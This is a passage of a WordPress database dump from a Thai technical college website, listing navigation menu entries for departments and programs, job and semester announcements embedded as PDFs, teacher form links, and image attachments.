(1261, 3, '2018-02-21 10:22:08', '2018-02-21 03:22:08', '', 'Maps', '', 'publish', 'closed', 'closed', '', 'maps', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1261', 22, 'nav_menu_item', '', 0),
(1262, 3, '2018-02-21 10:52:35', '2018-02-21 03:52:35', '', 'College Management', '', 'publish', 'closed', 'closed', '', 'college-management', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1262', 23, 'nav_menu_item', '', 0),
(1263, 3, '2018-02-21 10:52:36', '2018-02-21 03:52:36', '', 'Resource Management Department', '', 'publish', 'closed', 'closed', '', 'resource-management-department', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1263', 24, 'nav_menu_item', '', 0),
(1264, 3, '2018-02-21 10:52:36', '2018-02-21 03:52:36', '', 'Resource Management Team Structure', '', 'publish', 'closed', 'closed', '', 'resource-management-team-structure', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1264', 25, 'nav_menu_item', '', 0),
(1265, 3, '2018-02-21 10:52:36', '2018-02-21 03:52:36', '', 'General Management Division', '', 'publish', 'closed', 'closed', '', 'general-management-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1265', 26, 'nav_menu_item', '', 0),
(1266, 3, '2018-02-21 10:52:36', '2018-02-21 03:52:36', '', 'Human Resources Division', '', 'publish', 'closed', 'closed', '', 'human-resources-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1266', 27, 'nav_menu_item', '', 0),
(1267, 3, '2018-02-21 10:52:36', '2018-02-21 03:52:36', '', 'Finance Division', '', 'publish', 'closed', 'closed', '', 'finance-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1267', 28, 'nav_menu_item', '', 0),
(1268, 3, '2018-02-21 11:31:33', '2018-02-21 04:31:33', '', 'Accounting Division', '', 'publish', 'closed', 'closed', '', 'accounting-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1268', 29, 'nav_menu_item', '', 0),
(1269, 3, '2018-02-21 11:31:33', '2018-02-21 04:31:33', '', 'Supply Division', '', 'publish', 'closed', 'closed', '', 'supply-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1269', 30, 'nav_menu_item', '', 0),
(1270, 3, '2018-02-21 11:31:34', '2018-02-21 04:31:34', '', 'Building Division', '', 'publish', 'closed', 'closed', '', 'building-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1270', 31, 'nav_menu_item', '', 0),
(1271, 3, '2018-02-21 11:31:34', '2018-02-21 04:31:34', '', 'Registration Division', '', 'publish', 'closed', 'closed', '', 'registration-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1271', 32, 'nav_menu_item', '', 0),
(1272, 3, '2018-02-21 11:31:34', '2018-02-21 04:31:34', '', 'Public Relations Division', '', 'publish', 'closed', 'closed', '', 'public-relations-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1272', 33, 'nav_menu_item', '', 0),
(1273, 3, '2018-02-21 14:13:12', '2018-02-21 07:13:12', '', 'Plan & Cooperation Department', '', 'publish', 'closed', 'closed', '', 'plan-cooperation-department', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1273', 34, 'nav_menu_item', '', 0),
(1274, 3, '2018-02-21 14:17:27', '2018-02-21 07:17:27', '', 'Plan & Cooperation Team Structure', '', 'publish', 'closed', 'closed', '', 'plan-cooperation-team-structure', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1274', 35, 'nav_menu_item', '', 0),
(1275, 3, '2018-02-21 14:17:27', '2018-02-21 07:17:27', '', 'Plan and Budget Division', '', 'publish', 'closed', 'closed', '', 'plan-and-budget-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1275', 36, 'nav_menu_item', '', 0),
(1276, 3, '2018-02-21 14:17:27', '2018-02-21 07:17:27', '', 'Data Center Division', '', 'publish', 'closed', 'closed', '', 'data-center-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1276', 37, 'nav_menu_item', '', 0),
(1277, 3, '2018-02-21 14:17:27', '2018-02-21 07:17:27', '', 'Cooperation Division', '', 'publish', 'closed', 'closed', '', 'cooperation-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1277', 38, 'nav_menu_item', '', 0),
(1278, 3, '2018-02-21 14:50:36', '2018-02-21 07:50:36', '', 'Research, Development, Innovation & Invention Division', '', 'publish', 'closed', 'closed', '', 'research-development-innovation-invention-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1278', 39, 'nav_menu_item', '', 0),
(1279, 3, '2018-02-21 14:50:36', '2018-02-21 07:50:36', '', 'Quality Assurance & Education Standards Division', '', 'publish', 'closed', 'closed', '', 'quality-assurance-education-standards-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1279', 40, 'nav_menu_item', '', 0),
(1280, 3, '2018-02-21 15:01:48', '2018-02-21 08:01:48', '', 'Trading and Business Product Support Division', '', 'publish', 'closed', 'closed', '', 'trading-and-business-product-support-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1280', 41, 'nav_menu_item', '', 0),
(1281, 3, '2018-02-21 15:04:44', '2018-02-21 08:04:44', '', 'Student Affairs Development Department', '', 'publish', 'closed', 'closed', '', 'student-affairs-development-department', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1281', 42, 'nav_menu_item', '', 0),
(1282, 3, '2018-02-21 15:12:03', '2018-02-21 08:12:03', '', 'Student Affairs Development Team Structure', '', 'publish', 'closed', 'closed', '', 'student-affairs-development-team-structure', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1282', 43, 'nav_menu_item', '', 0),
(1283, 3, '2018-02-21 15:12:04', '2018-02-21 08:12:04', '', 'Student Activities Division', '', 'publish', 'closed', 'closed', '', 'student-activities-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1283', 44, 'nav_menu_item', '', 0),
(1284, 3, '2018-02-21 15:12:04', '2018-02-21 08:12:04', '', 'Teacher Adviser Division', '', 'publish', 'closed', 'closed', '', 'teacher-adviser-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1284', 45, 'nav_menu_item', '', 0),
(1285, 3, '2018-02-21 15:17:37', '2018-02-21 08:17:37', '', 'Principal\'s Division', '', 'publish', 'closed', 'closed', '', 'principals-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1285', 46, 'nav_menu_item', '', 0),
(1286, 3, '2018-02-21 15:29:44', '2018-02-21 08:29:44', '', 'Career Guidance & Recruitment Division', '', 'publish', 'closed', 'closed', '', 'career-guidance-recruitment-division', '', '', '2018-08-14 14:51:06', '2018-08-14 07:51:06', '', 0, 'http://www.technicrayong.ac.th/?p=1286', 47, 'nav_menu_item', '', 0),
(1287, 3, '2018-02-21 15:38:34', '2018-02-21 08:38:34', '', 'Student\'s Benefits Division', '', 'publish', 'closed', 'closed', '', 'students-benefits-division', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1287', 48, 'nav_menu_item', '', 0),
(1288, 3, '2018-02-21 15:38:34', '2018-02-21 08:38:34', '', 'Special Projects & Community Services Division', '', 'publish', 'closed', 'closed', '', 'special-projects-community-services-division', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1288', 49, 'nav_menu_item', '', 0),
(1289, 3, '2018-02-21 15:38:34', '2018-02-21 08:38:34', '', 'Academic Department', '', 'publish', 'closed', 'closed', '', 'academic-department', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1289', 50, 'nav_menu_item', '', 0),
(1290, 3, '2018-02-21 15:38:34', '2018-02-21 08:38:34', '', 'Academic Team Structure', '', 'publish', 'closed', 'closed', '', 'academic-team-structure', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1290', 51, 'nav_menu_item', '', 0),
(1291, 4, '2018-02-22 06:31:29', '2018-02-21 23:31:29', '<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/11wsqrbvPT25iO4w5nF9vciT98jsWejZ1/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน ปวช.ล้วน</a>\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/1wTDrgsPlh82AcfVNYRly08zVxCUcj3y9/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน ปวส.ล้วน</a> NEW\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/1ORTyW32zDqTBpkHvghoTvV6OUalEwDGq/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน 2ระดับ NEW</a>\r\n\r\n<hr />\r\n\r\n ', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-22 06:31:29', '2018-02-21 23:31:29', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1292, 3, '2018-02-22 09:02:09', '2018-02-22 02:02:09', '', 'Learning & Teaching Course Development', '', 'publish', 'closed', 'closed', '', 'learning-teaching-course-development', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1292', 52, 'nav_menu_item', '', 0),
(1293, 3, '2018-02-22 09:38:38', '2018-02-22 02:38:38', '', 'Measurement and Evaluation Division', '', 'publish', 'closed', 'closed', '', 'measurement-and-evaluation-division', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1293', 53, 'nav_menu_item', '', 0),
(1294, 3, '2018-02-22 09:43:51', '2018-02-22 02:43:51', '', 'Academic Resources and Library Division', '', 'publish', 'closed', 'closed', '', 'academic-resources-and-library-division', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1294', 54, 'nav_menu_item', '', 0),
(1295, 3, '2018-02-22 09:43:51', '2018-02-22 02:43:51', '', 'Dual Vocational Training (DVT) Division', '', 'publish', 'closed', 'closed', '', 'dual-vocational-training-dvt-division', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1295', 55, 'nav_menu_item', '', 0),
(1296, 3, '2018-02-22 09:52:13', '2018-02-22 02:52:13', '', 'Subject Department', '', 'publish', 'closed', 'closed', '', 'subject-department', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1296', 56, 'nav_menu_item', '', 0),
(1297, 3, '2018-02-22 09:52:13', '2018-02-22 02:52:13', '', 'Industry Department', '', 'publish', 'closed', 'closed', '', 'industrial-department', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1297', 57, 'nav_menu_item', '', 0),
(1298, 3, '2018-02-22 09:52:13', '2018-02-22 02:52:13', '', 'Commerce/Business Administration Program', '', 'publish', 'closed', 'closed', '', 'commerce-business-administration-department', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1298', 58, 'nav_menu_item', '', 0),
(1299, 3, '2018-02-22 14:33:42', '2018-02-22 07:33:42', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่งานกิจกรรม จำนวน 1 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81', '', '', '2018-02-22 14:33:42', '2018-02-22 07:33:42', '', 0, 'http://www.technicrayong.ac.th/?p=1299', 463, 'post', '', 0),
(1300, 3, '2018-02-22 14:31:41', '2018-02-22 07:31:41', '', 'ประกาศรับสมัครเจ้าหน้าที่งานกิจกรรม', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b9%80%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2', '', '', '2018-02-22 14:31:41', '2018-02-22 07:31:41', '', 1299, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/ประกาศรับสมัครเจ้าหน้าที่งานกิจกรรม.pdf', 0, 'attachment', 'application/pdf', 0),
(1301, 3, '2018-02-22 14:32:36', '2018-02-22 07:32:36', '', 'ประกาศรับสมัครเจ้าหน้าที่งานกิจกรรม', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b9%80%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%ab%e0%b8%99%e0%b9%89%e0%b8%b2-2', '', '', '2018-02-22 14:32:36', '2018-02-22 07:32:36', '', 1299, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/ประกาศรับสมัครเจ้าหน้าที่งานกิจกรรม-1.pdf', 0, 'attachment', 'application/pdf', 0),
(1302, 3, '2018-02-22 14:33:12', '2018-02-22 07:33:12', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่งานกิจกรรม จำนวน 1 อัตรา', '', 'inherit', 'closed', 'closed', '', '1299-revision-v1', '', '', '2018-02-22 14:33:12', '2018-02-22 07:33:12', '', 1299, 'http://www.technicrayong.ac.th/1299-revision-v1/', 0, 'revision', '', 0),
(1304, 3, '2018-02-23 10:38:20', '2018-02-23 03:38:20', '', 'Home Economics Department', '', 'publish', 'closed', 'closed', '', 'home-economics-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1304', 65, 'nav_menu_item', '', 0),
(1305, 3, '2018-02-23 10:38:20', '2018-02-23 03:38:20', '', 'Tourism Industry Department', '', 'publish', 'closed', 'closed', '', 'tourism-industry-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1305', 68, 'nav_menu_item', '', 0),
(1306, 3, '2018-02-23 10:38:20', '2018-02-23 03:38:20', '', 'Information & Communication Technology Department', '', 'publish', 'closed', 'closed', '', 'information-communication-technology-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1306', 71, 'nav_menu_item', '', 0),
(1307, 3, '2018-02-23 11:00:31', '2018-02-23 04:00:31', '', 'Accounting Program', '', 'publish', 'closed', 'closed', '', 'accounting-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1307', 59, 'nav_menu_item', '', 0),
(1308, 3, '2018-02-23 11:00:31', '2018-02-23 04:00:31', '', 'Marketing Program', '', 'publish', 'closed', 'closed', '', 'marketing-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1308', 60, 'nav_menu_item', '', 0),
(1309, 3, '2018-02-23 11:00:31', '2018-02-23 04:00:31', '', 'Secretarial/Office Management Program', '', 'publish', 'closed', 'closed', '', 'secretarial-office-management-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1309', 61, 'nav_menu_item', '', 0),
(1310, 3, '2018-02-23 11:00:31', '2018-02-23 04:00:31', '', 'Business Computer Program', '', 'publish', 'closed', 'closed', '', 'business-computer-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1310', 62, 'nav_menu_item', '', 0),
(1311, 3, '2018-02-23 11:00:32', '2018-02-23 04:00:32', '', 'Retail Business Program', '', 'publish', 'closed', 'closed', '', 'retail-business-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1311', 63, 'nav_menu_item', '', 0),
(1312, 3, '2018-02-23 11:00:32', '2018-02-23 04:00:32', '', 'Logistics Management Program', '', 'publish', 'closed', 'closed', '', 'logistics-management-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1312', 64, 'nav_menu_item', '', 0),
(1313, 3, '2018-02-23 11:00:32', '2018-02-23 04:00:32', '', 'Food & Nutrition Program', '', 'publish', 'closed', 'closed', '', 'food-nutrition-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1313', 66, 'nav_menu_item', '', 0),
(1314, 3, '2018-02-23 11:00:32', '2018-02-23 04:00:32', '', 'Home Economics Program', '', 'publish', 'closed', 'closed', '', 'home-economics-program-2', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1314', 67, 'nav_menu_item', '', 0),
(1315, 3, '2018-02-23 11:00:32', '2018-02-23 04:00:32', '', 'Hotel Program', '', 'publish', 'closed', 'closed', '', 'hotel-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1315', 69, 'nav_menu_item', '', 0),
(1316, 3, '2018-02-23 11:00:32', '2018-02-23 04:00:32', '', 'Tourism Program', '', 'publish', 'closed', 'closed', '', 'tourism-program', '', '', '2018-08-14 14:51:07', '2018-08-14 07:51:07', '', 0, 'http://www.technicrayong.ac.th/?p=1316', 70, 'nav_menu_item', '', 0),
(1317, 3, '2018-02-23 11:00:32', '2018-02-23 04:00:32', '', 'Information Technology Program', '', 'publish', 'closed', 'closed', '', 'information-technology-program', '', '', '2018-08-14 14:51:08', '2018-08-14 07:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=1317', 72, 'nav_menu_item', '', 0),
(1318, 3, '2018-02-23 11:03:31', '2018-02-23 04:03:31', '', 'I Systems', '', 'publish', 'closed', 'closed', '', 'it-systems', '', '', '2018-08-14 14:51:08', '2018-08-14 07:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=1318', 73, 'nav_menu_item', '', 0),
(1319, 3, '2018-02-23 11:08:20', '2018-02-23 04:08:20', '', 'RMS 2016', '', 'publish', 'closed', 'closed', '', 'rms-2016', '', '', '2018-08-14 14:51:08', '2018-08-14 07:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=1319', 74, 'nav_menu_item', '', 0),
(1320, 3, '2018-02-23 11:08:20', '2018-02-23 04:08:20', '', 'V-COP', '', 'publish', 'closed', 'closed', '', 'v-cop-2', '', '', '2018-08-14 14:51:08', '2018-08-14 07:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=1320', 75, 'nav_menu_item', '', 0),
(1321, 3, '2018-02-23 11:08:20', '2018-02-23 04:08:20', '', 'DataCenter', '', 'publish', 'closed', 'closed', '', 'datacenter-2', '', '', '2018-08-14 14:51:08', '2018-08-14 07:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=1321', 76, 'nav_menu_item', '', 0),
(1322, 3, '2018-02-23 11:08:21', '2018-02-23 04:08:21', '', 'KM', '', 'publish', 'closed', 'closed', '', 'km-2', '', '', '2018-08-14 14:51:08', '2018-08-14 07:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=1322', 77, 'nav_menu_item', '', 0),
(1323, 3, '2018-02-23 11:08:21', '2018-02-23 04:08:21', '', 'StudentCare', '', 'publish', 'closed', 'closed', '', 'studentcare-2', '', '', '2018-08-14 14:51:08', '2018-08-14 07:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=1323', 78, 'nav_menu_item', '', 0),
(1324, 3, '2018-02-23 11:08:21', '2018-02-23 04:08:21', '', 'R-Radio Network', '', 'publish', 'closed', 'closed', '', 'r-radio-network-2', '', '', '2018-08-14 14:51:08', '2018-08-14 07:51:08', '', 0, 'http://www.technicrayong.ac.th/?p=1324', 79, 'nav_menu_item', '', 0),
(1325, 3, '2018-02-23 12:49:35', '2018-02-23 05:49:35', '', 'Slider-01', '', 'inherit', 'closed', 'closed', '', '135-autosave-v1', '', '', '2018-02-23 12:49:35', '2018-02-23 05:49:35', '', 135, 'http://www.technicrayong.ac.th/135-autosave-v1/', 0, 'revision', '', 0),
(1326, 3, '2018-02-23 12:50:10', '2018-02-23 05:50:10', '', 'Slider-04', '', 'inherit', 'closed', 'closed', '', '146-autosave-v1', '', '', '2018-02-23 12:50:10', '2018-02-23 05:50:10', '', 146, 'http://www.technicrayong.ac.th/146-autosave-v1/', 0, 'revision', '', 0),
(1332, 3, '2018-02-23 14:33:13', '2018-02-23 07:33:13', '', '23-2-2561 14-33-47', '', 'inherit', 'closed', 'closed', '', '23-2-2561-14-33-47', '', '', '2018-02-23 14:33:13', '2018-02-23 07:33:13', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/23-2-2561-14-33-47.jpg', 0, 'attachment', 'image/jpeg', 0),
(1337, 4, '2018-02-23 16:02:35', '2018-02-23 09:02:35', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%9B%E0%B8%B4%E0%B8%94-12561-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศกำหนดการเปิด-ปิด ภาคเรียนที่ 1 ปีการศึกษา2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b8%81%e0%b8%b3%e0%b8%ab%e0%b8%99%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94-%e0%b8%9b%e0%b8%b4%e0%b8%94-%e0%b8%a0', '', '', '2018-02-23 16:19:06', '2018-02-23 09:19:06', '', 0, 'http://www.technicrayong.ac.th/?p=1337', 462, 'post', '', 0),
(1339, 4, '2018-02-23 16:00:38', '2018-02-23 09:00:38', '', 'ประกาศเปิดปิด 12561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b8%9b%e0%b8%b4%e0%b8%94-12561-2', '', '', '2018-02-23 16:00:38', '2018-02-23 09:00:38', '', 1337, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/ประกาศเปิดปิด-12561-1.pdf', 0, 'attachment', 'application/pdf', 0),
(1340, 4, '2018-02-23 16:02:35', '2018-02-23 09:02:35', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%9B%E0%B8%B4%E0%B8%94-12561-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศกำหนดการเปิด-ปิด ภาคเรียนที่ 1 ปีการศึกษา2561', '', 'inherit', 'closed', 'closed', '', '1337-revision-v1', '', '', '2018-02-23 16:02:35', '2018-02-23 09:02:35', '', 1337, 'http://www.technicrayong.ac.th/1337-revision-v1/', 0, 'revision', '', 0),
(1344, 3, '2018-02-26 11:52:12', '2018-02-26 04:52:12', '', '26-2-2561 11-53-08', '', 'inherit', 'closed', 'closed', '', '26-2-2561-11-53-08', '', '', '2018-02-26 11:52:12', '2018-02-26 04:52:12', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/26-2-2561-11-53-08.jpg', 0, 'attachment', 'image/jpeg', 0),
(1345, 3, '2018-02-26 11:52:17', '2018-02-26 04:52:17', '', '26-2-2561 11-50-09', '', 'inherit', 'closed', 'closed', '', '26-2-2561-11-50-09', '', '', '2018-02-26 11:52:17', '2018-02-26 04:52:17', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/26-2-2561-11-50-09.jpg', 0, 'attachment', 'image/jpeg', 0),
(1346, 3, '2018-02-26 11:52:22', '2018-02-26 04:52:22', '', '26-2-2561 11-51-09', '', 'inherit', 'closed', 'closed', '', '26-2-2561-11-51-09', '', '', '2018-02-26 11:52:22', '2018-02-26 04:52:22', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/26-2-2561-11-51-09.jpg', 0, 'attachment', 'image/jpeg', 0),
(1347, 3, '2018-02-26 11:56:42', '2018-02-26 04:56:42', '', '26-2-2561 11-54-39', '', 'inherit', 'closed', 'closed', '', '26-2-2561-11-54-39', '', '', '2018-02-26 11:56:42', '2018-02-26 04:56:42', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/26-2-2561-11-54-39.jpg', 0, 'attachment', 'image/jpeg', 0),
(1348, 3, '2018-02-26 11:56:46', '2018-02-26 04:56:46', '', '26-2-2561 11-55-38', '', 'inherit', 'closed', 'closed', '', '26-2-2561-11-55-38', '', '', '2018-02-26 11:56:46', '2018-02-26 04:56:46', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/26-2-2561-11-55-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(1350, 3, '2018-02-26 13:57:39', '2018-02-26 06:57:39', '', 'Detail of durable articles 1 object', '', 'inherit', 'closed', 'closed', '', 'detail-of-durable-articles-1-object', '', '', '2018-02-26 13:57:39', '2018-02-26 06:57:39', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/Detail-of-durable-articles-1-object.pdf', 0, 'attachment', 'application/pdf', 0),
